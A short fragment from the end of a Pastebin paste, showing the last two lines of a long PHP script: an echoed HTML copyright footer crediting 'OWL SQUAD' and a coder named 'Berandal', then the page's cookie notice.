  4575. <hr color='white'>Copyright &copy; ".date("Y")." - <a href='https://www.facebook.com/owlsquad.id' target='blank'><font color='white'>OWL SQUAD</font></a> | Code by <a href='https://www.twitter.com/id_berandal' target='_blank'><font color=white>Berandal</font></a></center>";
  4576. ?>
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top